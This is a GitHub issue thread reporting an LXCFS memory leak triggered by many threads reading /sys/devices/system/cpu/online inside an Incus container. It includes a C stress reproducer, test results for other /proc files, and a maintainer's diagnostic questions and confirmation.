Memory leak while reading /sys/devices/system/cpu/online inside an Incus container #677
Comments
Hi everyone, if there's any additional information we can provide, or any way we can assist in diagnosing the issue, please feel free to let me know. I'm happy to help in any way possible. Thank you! Regards, Deyan
Hey @DeyanSG, thanks for such a detailed report. I'm starting to investigate this and will let you know if any additional info is needed.
A direct_io mount will definitely make things worse if there is a memory leak on the LXCFS side, but that doesn't mean the change is wrong: direct_io is the only correct option for LXCFS. Just imagine having a page cache on procfs ;-) Can you please tell me your kernel version on the host, and whether you use ZFS by any chance?
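For background, direct_io is a per-file flag a FUSE filesystem sets when a file is opened; it tells the kernel to forward every read to the daemon instead of serving it from the page cache. A minimal libfuse3 sketch of the idea (illustrative only, not LXCFS's actual code):

```c
#define FUSE_USE_VERSION 35
#include <fuse3/fuse.h>

/* Sketch of an open handler that disables page caching for this file.
 * For /proc-style virtual files whose contents change between reads,
 * serving stale cached pages would return wrong data, so every read()
 * must reach the FUSE daemon. */
static int example_open(const char *path, struct fuse_file_info *fi)
{
    (void)path;
    fi->direct_io = 1;
    return 0;
}
```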
Hi @mihalicyn, thank you for looking into the issue!
I'm quite sure direct_io should stay on: a couple of years ago we were running a version from before that commit, and we saw some of the odd behavior the cache was causing :).
The host runs kernel 6.6.63. To rule out the kernel upgrade as the cause, we also tested with our previous kernel, 6.6.21, and were able to reproduce the issue there as well. We do not use ZFS.
I can confirm this. I'm actively investigating it and will fix it soon. Huge thanks again for such a detailed report.
Hello,
We are using Incus + lxcfs in our setup, and we've run into an issue with the memory consumption of the lxcfs process while reading aggressively from `/sys/devices/system/cpu/online`.
Versions
We've tested with different versions of both lxcfs and libfuse3, and the issue seems to be present even with the latest stable versions.
Setup
We are running an Incus container on a node with 56 CPU cores; the issue seems reproducible even with a single container. In our setup the container's CPU usage is restricted with `limits.cpu.allowance: 1200ms/60ms` (not directly relevant, but the effect shows up much faster if the container is allowed more CPU).
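For reference, such an allowance is applied per instance via the Incus CLI; the instance name `c1` below is just a placeholder:
incus config set c1 limits.cpu.allowance=1200ms/60ms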
Reproducer
To reproduce the issue, compile the following C code, which starts a number of threads inside the container, each repeatedly opening, reading from, and closing a file:
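The original attachment isn't reproduced here; a minimal sketch matching the behavior described above (N worker threads, each looping open/read/close on a single path, with the thread count and path taken from argv) might look like this:

```c
/* fuse-stress-poc.c — hypothetical reconstruction of the reproducer.
 * Build: gcc -O2 -pthread -o fuse-stress-poc fuse-stress-poc.c */
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static const char *target_path;

/* Each worker loops forever: open the target file, drain it, close it. */
static void *worker(void *arg)
{
    char buf[256];

    (void)arg;
    for (;;) {
        int fd = open(target_path, O_RDONLY);
        if (fd < 0)
            continue;
        while (read(fd, buf, sizeof(buf)) > 0)
            ;
        close(fd);
    }
    return NULL;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <threads> <path>\n", argv[0]);
        return 1;
    }

    long nthreads = strtol(argv[1], NULL, 10);
    target_path = argv[2];

    for (long i = 0; i < nthreads; i++) {
        pthread_t tid;
        if (pthread_create(&tid, NULL, worker, NULL) != 0) {
            perror("pthread_create");
            return 1;
        }
        pthread_detach(tid);
    }

    pause(); /* run until interrupted or killed */
    return 0;
}
```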
Run it with the following command in a container:
./fuse-stress-poc 400 /sys/devices/system/cpu/online
Monitor the RSS of the lxcfs process: we see it grow past 1 GB in about a minute. If we then stop or kill the stress process inside the container, lxcfs's RSS stays around the same value instead of dropping back to roughly 2 MB.
So far we've also run the same stress test against `/proc/uptime` and `/proc/cpuinfo` to check whether a leak shows up with these files as well.
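For example, using the same reproducer with only the path changed:
./fuse-stress-poc 400 /proc/uptime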
We could not reproduce the issue with either file: RSS usage stays low (around 2 MB) while reading them. We would appreciate your assistance in verifying whether this issue is reproducible on your end, so we can collaborate on identifying and implementing a solution.
We stumbled upon this while investigating other issues related to hanging lxcfs file operations, which is what prompted us to develop the stress test. Although we were unable to reproduce the hang, we identified what appears to be a memory leak.
Apologies for any confusion caused by opening, resolving, and then creating a new issue; I accidentally clicked the wrong option while typing.
Regards,
Deyan